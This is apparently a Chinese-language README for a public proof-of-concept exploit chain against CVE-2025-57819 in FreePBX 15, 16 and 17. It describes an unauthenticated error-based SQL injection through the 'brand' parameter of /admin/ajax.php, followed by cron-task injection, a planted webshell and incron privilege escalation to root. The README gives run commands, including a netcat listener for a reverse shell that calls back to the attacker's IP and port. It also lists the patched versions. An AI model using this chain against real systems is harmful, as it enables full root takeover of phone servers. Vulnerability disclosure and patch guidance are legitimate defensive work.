
FreePBX 15、16和17的完整链CVE-2025-57819 PoC:未经身份验证的SQL注入到RCE和root接管。
完整利用链PoC,针对CVE-2025-57819。FreePBX的endpoint模块中存在未认证的基于错误的SQL注入,通过cron任务注入和incron权限提升,最终获得root shell。
仅供授权测试与研究使用。请勿用于非自己拥有的系统。
SQLi (EXTRACTVALUE) → 插入cron任务 → 写入webshell → incron触发 → root shell
/admin/ajax.php 上进行基于错误的注入,提取数据库信息asterisk 用户身份获得RCEfwconsole 钩子git clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <目标> <本机IP> <本机端口> [--cleanup]
首先启动监听:
nc -lvnp 9999
然后运行:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup 参数可在利用后清除webshell和cron任务。
安装了 endpoint 模块的FreePBX。/admin/ajax.php 中的 brand 参数未经清理直接传入SQL查询。
| FreePBX | 修补版本 |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev